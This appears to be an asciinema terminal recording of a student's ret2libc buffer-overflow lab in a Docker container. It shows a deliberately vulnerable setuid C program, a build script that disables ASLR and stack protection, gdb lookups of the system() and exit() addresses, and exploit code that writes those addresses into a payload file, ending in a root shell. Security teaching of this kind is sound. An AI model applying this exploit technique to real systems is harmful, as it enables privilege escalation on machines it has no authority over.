{"version": 2, "width": 158, "height": 42, "timestamp": 1644429673, "idle_time_limit": 2.0, "env": {"SHELL": "/bin/zsh", "TERM": "xterm-256color"}}
[0.480285, "o", "\u001b[1m\u001b[7m%\u001b[27m\u001b[1m\u001b[0m                                                                                                                                                             \r \r"]
[0.481886, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[Jashvin@Manigandans-MacBook-Air-3 image % \u001b[K\u001b[?2004h"]
[2.602505, "o", "git push"]
[3.067977, "o", "\b\bll"]
[3.454386, "o", "\b\bsh"]
[4.13121, "o", "\b\b\b\bcommit -m \"added comments\""]
[5.215483, "o", "\u001b[26Dpush                      \u001b[22D"]
[5.414405, "o", "\b\bll"]
[5.657664, "o", "\b\bsh"]
[6.124485, "o", "\u001b[8D        \u001b[8D"]
[6.647219, "o", "git push"]
[6.875619, "o", "\b\bll"]
[7.086555, "o", "\b\bsh"]
[7.257408, "o", "\b\b\b\bcommit -m \"added comments\""]
[7.459313, "o", "\u001b[26Dadd .                     \u001b[21D"]
[7.842052, "o", "\b\b\b\b\bpush \b"]
[8.10821, "o", "\b\b\b\bcommit -m \"initial commit\""]
[8.299278, "o", "\u001b[26Dadd .                     \u001b[21D"]
[8.456952, "o", "\b\b\b\b\bcommit -m \"initial commit\""]
[8.643575, "o", "\u001b[30Dpython3 -m pip \u001b[2Cstal\u001b[2C-r requirements.txt"]
[9.898301, "o", "\u001b[42Dgit commit -m \"\u001b[2Citia\u001b[2Ccommit\"            \u001b[12D"]
[10.145869, "o", "\u001b[26Dadd .                     \u001b[21D"]
[10.317626, "o", "\b\b\b\b\bcommit -m \"initial commit\""]
[10.76158, "o", "\u001b[26Dpush                      \u001b[22D"]
[11.262704, "o", "\b\b\b\badd ."]
[11.343013, "o", "\b\b\b\b\bcommit -m \"added comments\""]
[11.428166, "o", "\u001b[26Dpush                      \u001b[22D"]
[11.509953, "o", "\b\bll"]
[11.595737, "o", "\b\bsh"]
[11.679747, "o", "\u001b[8D        \u001b[8D"]
[12.785124, "o", "d"]
[12.878596, "o", "\bdo"]
[13.501329, "o", "c"]
[13.795935, "o", "k"]
[13.95416, "o", "e"]
[14.066967, "o", "r"]
[16.669192, "o", "\b \b"]
[17.1677, "o", "\b \b"]
[17.253513, "o", "\b \b"]
[17.338, "o", "\b \b"]
[17.418384, "o", "\b\bd \b"]
[17.505474, "o", "\b \b"]
[18.378914, "o", "d"]
[18.601404, "o", "\bdo"]
[18.730693, "o", "c"]
[19.091597, "o", "k"]
[19.21249, "o", "e"]
[19.312436, "o", "r"]
[19.596122, "o", " "]
[20.25549, "o", "p"]
[20.365585, "o", "s"]
[20.520572, "o", " "]
[21.251757, "o", "-"]
[21.365146, "o", "a"]
[21.65046, "o", "\u001b[?2004l\r\r\n"]
[21.846795, "o", "CONTAINER ID   IMAGE                       COMMAND                  CREATED        STATUS                      PORTS                  NAMES\r\nda1b1448f5b5   sierraneu/buffer-overflow   \"/bin/bash\"              6 days ago     Exited (0) 6 days ago                              old-buffer-overflow-old\r\n0276de5c365a   sierraneu/ret2libc          \"/bin/bash\"              6 days ago     Up 6 days                "]
[21.847069, "o", "                          buffer-overflow\r\n715be564d899   sierraneu/database_lab      \"/entrypoint.sh mysq…\"   2 months ago   Exited (255) 6 days ago     3306/tcp, 33060/tcp    mysql\r\n4c0a9dd42bc2   sierraneu/vulpass:T37       \"/usr/sbin/sshd -D\"      3 months ago   Created                                            beautiful_williamson\r\n2596f9dfb2db   sierraneu/vulpass:T37       \"/usr/sbin/sshd -D\"      3 months ago   Exited (255) 3 months ago   0.0.0.0:2222->22/tcp   quirky_liskov\r\n"]
[21.86848, "o", "\u001b[1m\u001b[7m%\u001b[27m\u001b[1m\u001b[0m                                                                                                                                                             \r \r"]
[21.868685, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[Jashvin@Manigandans-MacBook-Air-3 image % \u001b[K\u001b[?2004h"]
[28.210157, "o", "d"]
[28.291364, "o", "\bdo"]
[28.427438, "o", "c"]
[29.014318, "o", "k"]
[29.130063, "o", "e"]
[29.253669, "o", "r"]
[29.435399, "o", " "]
[30.566118, "o", "e"]
[30.85302, "o", "x"]
[31.119959, "o", "e"]
[31.269866, "o", "c"]
[31.630685, "o", "i"]
[32.168813, "o", "\b \b"]
[32.388505, "o", " "]
[33.672665, "o", "-"]
[34.003386, "o", "t"]
[34.116458, "o", " "]
[35.376396, "o", "\b"]
[35.509185, "o", "\b \b"]
[36.148835, "o", "i"]
[36.357994, "o", "t"]
[36.499049, "o", " "]
[37.227709, "o", "\u001b[7mbuffer-overflow\u001b[27m"]
[37.77925, "o", "\u001b[15D\u001b[27mb\u001b[27mu\u001b[27mf\u001b[27mf\u001b[27me\u001b[27mr\u001b[27m-\u001b[27mo\u001b[27mv\u001b[27me\u001b[27mr\u001b[27mf\u001b[27ml\u001b[27mo\u001b[27mw"]
[38.631893, "o", " "]
[43.417303, "o", "\b"]
[43.937942, "o", "\u001b[?2004l\r\r\n"]
[44.11058, "o", "\"docker exec\" requires at least 2 arguments.\r\nSee 'docker exec --help'.\r\n\r\nUsage:  docker exec [OPTIONS] CONTAINER COMMAND [ARG...]\r\n\r\nRun a command in a running container\r\n"]
[44.132365, "o", "\u001b[1m\u001b[7m%\u001b[27m\u001b[1m\u001b[0m                                                                                                                                                             \r \r"]
[44.132513, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[Jashvin@Manigandans-MacBook-Air-3 image % \u001b[K\u001b[?2004h"]
[46.154079, "o", "docker exec -it buffer-overflow"]
[47.133255, "o", " "]
[47.654561, "o", "/"]
[48.415053, "o", "b"]
[48.677242, "o", "i"]
[48.878594, "o", "n"]
[49.555003, "o", "/"]
[49.974417, "o", "b"]
[50.079112, "o", "a"]
[50.212955, "o", "s"]
[50.484674, "o", "h"]
[50.920311, "o", "\u001b[?2004l\r\r\n"]
[51.240527, "o", "user@0276de5c365a:~$ "]
[52.504238, "o", "\r\u001b[Kuser@0276de5c365a:~$ c"]
[52.827081, "o", "l"]
[52.938728, "o", "e"]
[53.07568, "o", "a"]
[53.218429, "o", "r"]
[53.403246, "o", "\r\n"]
[53.406399, "o", "\u001b[3;J\u001b[H\u001b[2J"]
[53.407291, "o", "user@0276de5c365a:~$ "]
[54.002113, "o", "l"]
[54.085178, "o", "s"]
[54.287391, "o", "\r\n"]
[54.291305, "o", "build.sh  exploit  exploit.c  filcpy  filcpy.c\tgetenv\tgetenv.c  malfile\r\nuser@0276de5c365a:~$ "]
[57.852938, "o", "c"]
[57.98052, "o", "a"]
[58.266398, "o", "t"]
[58.436369, "o", " "]
[59.655522, "o", "f"]
[59.750148, "o", "i"]
[59.907428, "o", "l"]
[60.502762, "o", "c"]
[60.657064, "o", "p"]
[61.232677, "o", "y"]
[62.35019, "o", "."]
[62.494313, "o", "c"]
[62.849012, "o", "\r\n"]
[62.850711, "o", "/* filcpy.c */\r\n/* This program has a buffer overflow vulnerability. */\r\n/* Our task is to exploit this vulnerability */\r\n\r\n#include <stdlib.h>\r\n#include <stdio.h>\r\n#include <string.h>\r\n#ifndef BUF_SIZE\r\n#define BUF_SIZE 444 //Enter the value generated using NUID here (instead of 350)\r\n#endif\r\n\r\nint bof(FILE *malfile)\r\n{\r\n    char buffer[BUF_SIZE];\r\n\r\n    /* The following statement has a buffer overflow problem */\r\n    fread(buffer, sizeof(char), 472, malfile);// change 512 to an appropriate value (atmost 200-300 bytes greater than the BUF_SIZE). \r\n\r\n    return 1;\r\n}\r\n\r\nint main(int argc, char **argv)\r\n{\r\n    FILE *malfile;\r\n\r\n    malfile = fopen(\"malfile\", \"r\");\r\n    printf(\"Preparing to copy the file.......\\n\");\r\n    printf(\"Stand By.... 1.. 2....3..\\n\");\r\n//function call statement\t\r\n    bof(malfile);\r\n    printf(\"the function returns, you failed to get a shell, try again\\n\");\r\n    fclose(malfile);\r\n    return 1;\r\n}\r\nuser@0276de5c365a:~$ "]
[80.284978, "o", "c"]
[80.425215, "o", "a"]
[80.980308, "o", "\b \b"]
[81.115641, "o", "\b \b"]
[81.574712, "o", "c"]
[81.738092, "o", "l"]
[81.910721, "o", "e"]
[82.018718, "o", "a"]
[82.203373, "o", "r"]
[82.390259, "o", "\r\n"]
[82.393738, "o", "\u001b[3;J\u001b[H\u001b[2Juser@0276de5c365a:~$ "]
[83.595085, "o", "c"]
[83.702383, "o", "a"]
[83.868174, "o", "t"]
[83.999283, "o", " "]
[84.759983, "o", "b"]
[85.072475, "o", "u"]
[85.179055, "o", "i"]
[85.475697, "o", "l"]
[85.807053, "o", "d"]
[86.521845, "o", "."]
[87.142042, "o", "s"]
[87.231768, "o", "h"]
[87.789866, "o", "\r\n"]
[87.793517, "o", "#!/bin/bash exploit.c  filcpy.c  getenv.c\r\n\r\nsudo sysctl -w kernel.randomize_va_space=0\r\nsudo ln -sf /bin/zsh /bin/sh\r\n\r\ngcc -z noexecstack -fno-stack-protector -m32 -ggdb3 -o filcpy filcpy.c\r\nsudo chown root filcpy\r\nsudo chmod 4755 filcpy\r\n\r\ngcc -z noexecstack -fno-stack-protector -m32 -ggdb3 -o getenv getenv.c\r\nsudo chown root getenv\r\nsudo chmod 4755 getenv\r\n\r\ngcc -z noexecstack -fno-stack-protector -m32 -ggdb3 -o exploit exploit.c\r\nsudo chown root exploit\r\nsudo chmod 4755 exploit\r\nuser@0276de5c365a:~$ "]
[103.305545, "o", "c"]
[103.484739, "o", "a"]
[103.596591, "o", "t"]
[104.565679, "o", "\b \b"]
[104.723877, "o", "\b \b"]
[104.867065, "o", "\b \b"]
[107.379102, "o", "c"]
[107.651447, "o", "l"]
[107.783905, "o", "e"]
[107.869896, "o", "a"]
[108.09546, "o", "r"]
[108.303155, "o", "\r\n"]
[108.305501, "o", "\u001b[3;J\u001b[H\u001b[2J"]
[108.30621, "o", "user@0276de5c365a:~$ "]
[110.45745, "o", "s"]
[110.562703, "o", "h"]
[110.709014, "o", " "]
[111.291794, "o", "b"]
[111.614247, "o", "u"]
[111.719244, "o", "i"]
[111.941163, "o", "l"]
[112.076116, "o", "d"]
[112.726577, "o", "."]
[112.935593, "o", "s"]
[113.144648, "o", "h"]
[113.526425, "o", "\r\n"]
[113.539249, "o", "[sudo] password for user: "]
[115.240617, "o", "\r\n"]
[115.256613, "o", "kernel.randomize_va_space = 0\r\n"]
[115.450165, "o", "user@0276de5c365a:~$ "]
[119.005232, "o", "."]
[119.876208, "o", "\b \b"]
[120.701527, "o", "g"]
[120.870376, "o", "d"]
[121.056345, "o", "b"]
[121.398845, "o", " "]
[122.881572, "o", "f"]
[122.989231, "o", "i"]
[123.181629, "o", "l"]
[124.053198, "o", "c"]
[124.157939, "o", "p"]
[124.461835, "o", "y"]
[124.828506, "o", "\r\n"]
[124.915738, "o", "GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1\r\nCopyright (C) 2016 Free Software Foundation, Inc.\r\nLicense GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>\r\nThis is free software: you are free to change and redistribute it.\r\nThere is NO WARRANTY, to the extent permitted by law.  Type \"show copying\"\r\nand \"show warranty\" for details.\r\nThis GDB was configured as \"x86_64-linux-gnu\".\r\nType \"show configuration\" for configuration details.\r\nFor bug reporting instructions, please see:\r\n<http://www.gnu.org/software/gdb/bugs/>.\r\nFind the GDB manual and other documentation resources online at:\r\n<http://www.gnu.org/software/gdb/documentation/>.\r\nFor help, type \"help\".\r\nType \"apropos word\" to search for commands related to \"word\"...\r\nReading symbols from filcpy..."]
[124.916422, "o", "done.\r\n"]
[124.918233, "o", "(gdb) "]
[127.038485, "o", "b"]
[127.256476, "o", " "]
[127.540897, "o", "m"]
[127.654229, "o", "a"]
[127.808941, "o", "i"]
[128.034943, "o", "n"]
[128.437862, "o", "\r\nBreakpoint 1 at 0x80484f5: file filcpy.c, line 26.\r\n(gdb) "]
[129.492288, "o", "r"]
[129.615943, "o", "u"]
[129.820196, "o", "n"]
[130.131672, "o", "\r\nStarting program: /home/user/filcpy \r\n"]
[130.163245, "o", "\r\n"]
[130.165686, "o", "Breakpoint 1, main (argc=1, argv=0xffffde04) at filcpy.c:26\r\n26\t    malfile = fopen(\"malfile\", \"r\");\r\n(gdb) "]
[131.165635, "o", "p"]
[131.349568, "o", " "]
[131.644569, "o", "s"]
[131.891112, "o", "y"]
[132.037967, "o", "s"]
[132.432291, "o", "t"]
[132.675943, "o", "e"]
[132.793817, "o", "m"]
[133.227603, "o", "\r\n$1 = {<text variable, no debug info>} 0xf7e52950 <system>\r\n(gdb) "]
[137.735933, "o", "p"]
[138.053677, "o", " "]
[138.655024, "o", "e"]
[138.914565, "o", "x"]
[139.04204, "o", "i"]
[139.268816, "o", "t"]
[140.149654, "o", "\r\n$2 = {<text variable, no debug info>} 0xf7e467c0 <exit>\r\n(gdb) "]
[144.089006, "o", "q"]
[145.628094, "o", "u"]
[145.730029, "o", "i"]
[147.718063, "o", "t"]
[148.538922, "o", "\r\nA debugging session is active.\r\n\r\n\tInferior 1 [process 1685] will be killed.\r\n\r\nQuit anyway? (y or n) "]
[149.934442, "o", "y"]
[150.289184, "o", "\r\n"]
[150.306895, "o", "user@0276de5c365a:~$ "]
[155.864341, "o", "e"]
[156.079475, "o", "c"]
[156.409914, "o", "h"]
[156.638904, "o", "o"]
[156.810329, "o", " "]
[158.391315, "o", "-"]
[159.122651, "o", "e"]
[159.264317, "o", " "]
[161.643663, "o", "#"]
[162.033179, "o", "\b \b"]
[162.588891, "o", "$"]
[164.305824, "o", "B"]
[164.491818, "o", "A"]
[164.660852, "o", "S"]
[165.204272, "o", "H"]
[165.798045, "o", "_"]
[166.2563, "o", "P"]
[166.355663, "o", "A"]
[166.620087, "o", "T"]
[166.822547, "o", "H"]
[167.36662, "o", "\r\n\r\nuser@0276de5c365a:~$ "]
[174.177213, "o", "c"]
[174.359759, "o", "a"]
[174.517309, "o", "t"]
[175.072203, "o", " "]
[178.484697, "o", "g"]
[178.568767, "o", "e"]
[178.70309, "o", "t"]
[179.662978, "o", "e"]
[179.797433, "o", "b"]
[180.345371, "o", "\b \b"]
[182.307112, "o", "n"]
[182.60231, "o", "v"]
[183.533351, "o", "."]
[183.650618, "o", "c"]
[184.25985, "o", "\r\n"]
[184.263254, "o", "#include <stdlib.h>\r\n#include <stdio.h>\r\n\r\nvoid main()\r\n{\r\n  char* shell = (char*)getenv(\"BASH_PATH\");\r\n  if(shell){\r\n  printf(\"%p\\n\", shell);\r\n}\r\n}\r\n\r\n"]
[184.26431, "o", "user@0276de5c365a:~$ "]
[188.523109, "o", "cat getenv.c"]
[189.263638, "o", "\b\b\b\b\b\b\b\b\b\b\b\b\u001b[K"]
[191.468493, "o", "."]
[191.704432, "o", "/"]
[192.430846, "o", "g"]
[192.55091, "o", "e"]
[192.654059, "o", "t"]
[193.448362, "o", "e"]
[193.785973, "o", "n"]
[194.121412, "o", "v"]
[195.104732, "o", "\r\n"]
[195.107014, "o", "user@0276de5c365a:~$ "]
[200.690595, "o", "./getenv"]
[200.884826, "o", "\b\b\b\b\b\b\b\bcat getenv.c"]
[201.287775, "o", "\b\b\b\b\b\b\b\b\b\b\b\b\u001b[4P./getenv"]
[201.704551, "o", "\b\b\b\b\b\b\b\b\u001b[K"]
[202.959286, "o", "e"]
[203.229143, "o", "x"]
[203.964199, "o", "p"]
[204.092247, "o", "o"]
[204.547097, "o", "r"]
[204.626094, "o", "t"]
[204.758075, "o", " "]
[208.59732, "o", "B"]
[208.749548, "o", "A"]
[208.868522, "o", "S"]
[209.471283, "o", "H"]
[210.600313, "o", "_"]
[211.024863, "o", "P"]
[211.144145, "o", "A"]
[211.409641, "o", "T"]
[211.609667, "o", "H"]
[213.363387, "o", "="]
[215.827498, "o", "/"]
[216.547421, "o", "b"]
[216.826776, "o", "i"]
[217.910043, "o", "n"]
[218.680987, "o", "/"]
[220.380087, "o", "a"]
[220.423064, "o", "s"]
[221.101654, "o", "\b \b"]
[221.228317, "o", "\b \b"]
[221.677826, "o", "s"]
[221.744774, "o", "h"]
[235.222301, "o", "\r\nuser@0276de5c365a:~$ "]
[236.02814, "o", "export BASH_PATH=/bin/sh"]
[236.222621, "o", "\ruser@0276de5c365a:~$ \u001b[16P./getenv"]
[236.696549, "o", "\b\b\b\b\b\b\b\bcat getenv.c"]
[237.191454, "o", "\b\b\b\b\b\b\b\b\b\b\b\becho -e $BASH_PATH"]
[237.943788, "o", "\r\n/bin/sh\r\nuser@0276de5c365a:~$ "]
[238.893424, "o", "echo -e $BASH_PATH"]
[239.065014, "o", "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\bxport BASH_PATH=/bin/sh"]
[239.526707, "o", "\ruser@0276de5c365a:~$ \u001b[16P./getenv"]
[240.263619, "o", "\r\n"]
[240.267597, "o", "0xffffdf73\r\n"]
[240.268271, "o", "user@0276de5c365a:~$ "]
[253.720768, "o", "c"]
[253.986087, "o", "l"]
[254.081278, "o", "e"]
[254.187702, "o", "a"]
[254.364994, "o", "r"]
[254.503847, "o", "\r\n"]
[254.507424, "o", "\u001b[3;J\u001b[H\u001b[2J"]
[254.508552, "o", "user@0276de5c365a:~$ "]
[257.056947, "o", "n"]
[257.140749, "o", "a"]
[257.314858, "o", "n"]
[257.541467, "o", "o"]
[257.681017, "o", " "]
[258.207543, "o", "e"]
[258.461773, "o", "x"]
[259.124248, "o", "p"]
[259.558687, "o", "l"]
[259.775189, "o", "o"]
[259.954172, "o", "i"]
[260.306264, "o", "t"]
[261.231088, "o", "."]
[262.08345, "o", "c"]
[262.406497, "o", "\r\n"]
[262.435973, "o", "\u001b[?1049h\u001b[1;42r\u001b(B\u001b[m\u001b[4l\u001b[?7h\u001b[?1h\u001b=\u001b[?1h\u001b=\u001b[?1h\u001b="]
[262.437137, "o", "\u001b[39;49m\u001b[?25l\u001b[39;49m\u001b(B\u001b[m\u001b[H\u001b[2J\u001b[40;72H\u001b(B\u001b[0;7m[ Reading File ]\r\u001b[3d\u001b(B\u001b[m"]
[262.438177, "o", "\u001b[40;71H\u001b(B\u001b[0;7m[ Read 30 lines\r\u001b[33d\u001b(B\u001b[m"]
[262.442176, "o", "\u001b[?12l\u001b[?25h"]
[262.445006, "o", "\u001b[H\u001b[39;49m\u001b(B\u001b[0;7m  GNU nano 2.5.3                                        File: exploit.c                                                                                       \u001b[3;1H\u001b(B\u001b[0;1m\u001b[36m#include\u001b[39m\u001b(B\u001b[m \u001b(B\u001b[0;1m\u001b[33m<stdlib.h>\r\u001b[4d\u001b[36m#include\u001b[39m\u001b(B\u001b[m \u001b(B\u001b[0;1m\u001b[33m<stdio.h>\r\u001b[5d\u001b[36m#include\u001b[39m\u001b(B\u001b[m \u001b(B\u001b[0;1m\u001b[33m<string.h>\r\u001b[7d\u001b(B\u001b[0m\u001b[32mvoid\u001b[39m\u001b(B\u001b[m injection(\u001b[32mchar\u001b[39m\u001b(B\u001b[m buf[])\r\u001b[8d{\u001b[9d\u001b(B\u001b[0;1m\u001b[34m/* You need to decide the addresses and\u001b(B\u001b[0m\u001b[42m \u001b[10;5H\u001b(B\u001b[0;1m\u001b[34m\u001b[1K the values for arg1, arg2, arg3. The order of the following\u001b(B\u001b[0m\u001b[42m \u001b[11;5H\u001b(B\u001b[0;1m\u001b[34m\u001b[1K three statements does not imply the order of arg1, arg2, arg3.\u001b[12;5H\u001b[1K Actually, we intentionally scrambled the order. */\u001b[13;3H\u001b[39m\u001b(B\u001b[m*(\u001b[32mlong\u001b[39m\u001b(B\u001b[m *) &buf[464] = 0xffffdf73;   \u001b(B\u001b[0;1m\u001b[34m//  \"/bin/sh\"\u001b[14;3H\u001b[39m\u001b(B\u001b[m*(\u001b[32mlong\u001b[39m\u001b(B\u001b[m *) &buf[456] = 0xf7e52950;   \u001b(B\u001b[0;1m\u001b[34m//  system()\u001b[15;3H\u001b[39m\u001b(B\u001b[m*(\u001b[32mlong\u001b[39m\u001b(B\u001b[m *) &buf[460] = 0xf7e467c0;   \u001b(B\u001b[0;1m\u001b[34m//  "]
[262.445273, "o", "exit()\r\u001b[16d\u001b[39m\u001b(B\u001b[m}\u001b[20d\b\u001b[32mint\u001b[39m\u001b(B\u001b[m main(\u001b[32mint\u001b[39m\u001b(B\u001b[m argc, \u001b[32mchar\u001b[39m\u001b(B\u001b[m **argv)\r\u001b[21d{\u001b[22d \u001b[32mchar\u001b[39m\u001b(B\u001b[m buf[472]; \u001b(B\u001b[0;1m\u001b[34m//remove 456 size and change this exploit buffer size appropriately\u001b(B\u001b[0m\u001b[42m \u001b[23;3H\u001b[49m\u001b[32mchar\u001b[39m\u001b(B\u001b[m *ptr;\u001b[24;3Hptr = &buf[0];\u001b[25;3H\u001b(B\u001b[0;1m\u001b[31mFILE\u001b[39m\u001b(B\u001b[m *malfile;\u001b[27;3Hmalfile = fopen(\u001b(B\u001b[0;1m\u001b[33m\"./malfile\"\u001b[39m\u001b(B\u001b[m, \u001b(B\u001b[0;1m\u001b[33m\"w\"\u001b[39m\u001b(B\u001b[m);\u001b[28;3H\u001b(B\u001b[0;1m\u001b[34m//function call\u001b[29;3H\u001b[39m\u001b(B\u001b[minjection(ptr);\u001b[30;3Hfwrite(buf, \u001b[32msizeof\u001b[39m\u001b(B\u001b[m(buf), 1, malfile);\u001b[31;3Hfclose(malfile);\r\u001b[32d}\u001b[41d\b\u001b(B\u001b[0;7m^G\u001b(B\u001b[m Get Help\u001b[18G\u001b(B\u001b[0;7m^O\u001b(B\u001b[m Write Out     \u001b(B\u001b[0;7m^W\u001b(B\u001b[m Where Is\u001b[52G\u001b(B\u001b[0;7m^K\u001b(B\u001b[m Cut Text\u001b[69G\u001b(B\u001b[0;7m^J\u001b(B\u001b[m Justify\u001b[86G\u001b(B\u001b[0;7m^C\u001b(B\u001b[m Cur Pos\u001b[103G\u001b(B\u001b[0;7m^Y\u001b(B\u001b[m Prev Page     \u001b(B\u001b[0;7mM-\\\u001b(B\u001b[m First Line   \u001b(B\u001b[0;7mM-W\u001b(B\u001b[m WhereIs Next\r\u001b[42d\u001b(B\u001b[0;7m^X\u001b(B\u001b[m Exit\u001b[42;18H\u001b(B\u001b[0;7m^R\u001b(B\u001b[m Read File     \u001b(B\u001b[0;7m^\\\u001b(B\u001b[m Replace\u001b[52G\u001b(B\u001b[0;7m^U\u001b(B\u001b[m Uncut Text    \u001b(B\u001b["]
[262.445555, "o", "0;7m^T\u001b(B\u001b[m To Spell\u001b[86G\u001b(B\u001b[0;7m^_\u001b(B\u001b[m Go To Line    \u001b(B\u001b[0;7m^V\u001b(B\u001b[m Next Page     \u001b(B\u001b[0;7mM-/\u001b(B\u001b[m Last Line    \u001b(B\u001b[0;7mM-]\u001b(B\u001b[m To Bracket\r\u001b[3d"]
[276.384311, "o", "\u001b[40d\u001b[J\u001b[42;158H\u001b[42;1H\u001b[?1049l\r\u001b[?1l\u001b>"]
[276.385173, "o", "user@0276de5c365a:~$ "]
[279.128418, "o", "nano exploit.c"]
[279.317439, "o", "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\u001b[9Pclear"]
[279.508436, "o", "\b\b\b\b\b./getenv"]
[279.999204, "o", "\b\b\b\b\b\b\b\b\u001b[3Pclear"]
[280.350887, "o", "\b\b\b\b\b./getenv"]
[280.530176, "o", "\b\b\b\b\b\b\b\becho -e $BASH_PATH"]
[280.701181, "o", "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\bxport BASH_PATH=/bin/sh"]
[281.122065, "o", "\ruser@0276de5c365a:~$ \u001b[16P./getenv"]
[281.62967, "o", "\b\b\b\b\b\b\b\bexport BASH_PATH=/bin/sh"]
[282.099667, "o", "\ruser@0276de5c365a:~$ \u001b[16P./getenv"]
[282.288463, "o", "\b\b\b\b\b\b\b\bcat getenv.c"]
[282.778325, "o", "\b\b\b\b\b\b\b\b\b\b\b\becho -e $BASH_PATH"]
[283.378722, "o", "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\u001b[6Pcat getenv.c"]
[284.433013, "o", "\b\b\b\b\b\b\b\b\b\b\b\b\u001b[4P./getenv"]
[285.183149, "o", "\b\b\b\b\b\b\b\bexport BASH_PATH=/bin/sh"]
[285.732057, "o", "\b \b"]
[286.233646, "o", "\b \b"]
[286.318301, "o", "\b \b"]
[286.402152, "o", "\b \b"]
[286.485501, "o", "\b \b"]
[286.570414, "o", "\b \b"]
[286.656236, "o", "\b \b"]
[286.736179, "o", "\b \b"]
[286.821124, "o", "\b \b"]
[286.905401, "o", "\b \b"]
[286.98404, "o", "\b \b"]
[287.0722, "o", "\b \b"]
[287.155824, "o", "\b \b"]
[287.239729, "o", "\b \b"]
[287.325813, "o", "\b \b"]
[287.407669, "o", "\b \b"]
[287.490079, "o", "\b \b"]
[287.573676, "o", "\b \b"]
[287.659228, "o", "\b \b"]
[287.743092, "o", "\b \b"]
[287.826916, "o", "\b \b"]
[287.910919, "o", "\b \b"]
[287.996006, "o", "\b \b"]
[288.080244, "o", "\b \b"]
[288.163388, "o", "\u0007"]
[288.243251, "o", "\u0007"]
[288.724909, "o", "s"]
[288.780587, "o", "h"]
[288.924499, "o", " "]
[289.482823, "o", "b"]
[289.725652, "o", "u"]
[289.810612, "o", "i"]
[290.051692, "o", "l"]
[290.187819, "o", "d"]
[290.765631, "o", "."]
[290.954639, "o", "s"]
[291.114856, "o", "h"]
[291.513758, "o", "\r\n"]
[291.529613, "o", "kernel.randomize_va_space = 0\r\n"]
[291.729351, "o", "user@0276de5c365a:~$ "]
[293.394975, "o", "."]
[293.848808, "o", "/"]
[294.391348, "o", "e"]
[294.649296, "o", "x"]
[295.001187, "o", "p"]
[295.189111, "o", "l"]
[295.38287, "o", "o"]
[295.589999, "o", "i"]
[295.883301, "o", "t"]
[296.802625, "o", "\r\n"]
[296.806306, "o", "user@0276de5c365a:~$ "]
[297.701638, "o", "."]
[297.926365, "o", "/"]
[298.590912, "o", "f"]
[298.691559, "o", "i"]
[298.911703, "o", "l"]
[299.861728, "o", "c"]
[299.966594, "o", "p"]
[300.287514, "o", "y"]
[301.062191, "o", "\r\n"]
[301.06504, "o", "Preparing to copy the file.......\r\nStand By.... 1.. 2....3..\r\n"]
[301.072127, "o", "\u001b[1m\u001b[7m#\u001b[27m\u001b[1m\u001b[0m                                                                                                                                                             \r \r"]
[301.073391, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J# \u001b[K\u001b[?2004h"]
[303.053036, "o", "i"]
[303.124725, "o", "\bid"]
[303.526344, "o", "\u001b[?2004l\r\r\n"]
[303.531284, "o", "uid=1001(user) gid=65534(nogroup) euid=0(root) groups=65534(nogroup),27(sudo)\r\n\u001b[1m\u001b[7m#\u001b[27m\u001b[1m\u001b[0m                                                                                                                                                             \r \r\r\u001b[0m\u001b[27m\u001b[24m\u001b[J# \u001b[K\u001b[?2004h"]
[305.250373, "o", "w"]
[305.580345, "o", "\bwh"]
[305.871666, "o", "o"]
[307.186206, "o", "a"]
[307.302051, "o", "m"]
[307.975959, "o", "i"]
[308.407788, "o", "\u001b[?2004l\r\r\n"]
[308.412193, "o", "root\r\n\u001b[1m\u001b[7m#\u001b[27m\u001b[1m\u001b[0m                                                                                                                                                             \r \r\r\u001b[0m\u001b[27m\u001b[24m\u001b[J# \u001b[K\u001b[?2004h"]
[312.972068, "o", "e"]
[315.023675, "o", "\bex"]
[315.127644, "o", "i"]
[317.344144, "o", "t"]
[317.98621, "o", "\u001b[?2004l\r\r\n"]
[317.987853, "o", "user@0276de5c365a:~$ "]
[327.378599, "o", "exit\r\n"]
[327.444297, "o", "\u001b[1m\u001b[7m%\u001b[27m\u001b[1m\u001b[0m                                                                                                                                                             \r \r"]
[327.444543, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[Jashvin@Manigandans-MacBook-Air-3 image % \u001b[K\u001b[?2004h"]
[330.527676, "o", "\u001b[?2004l\r\r\n"]
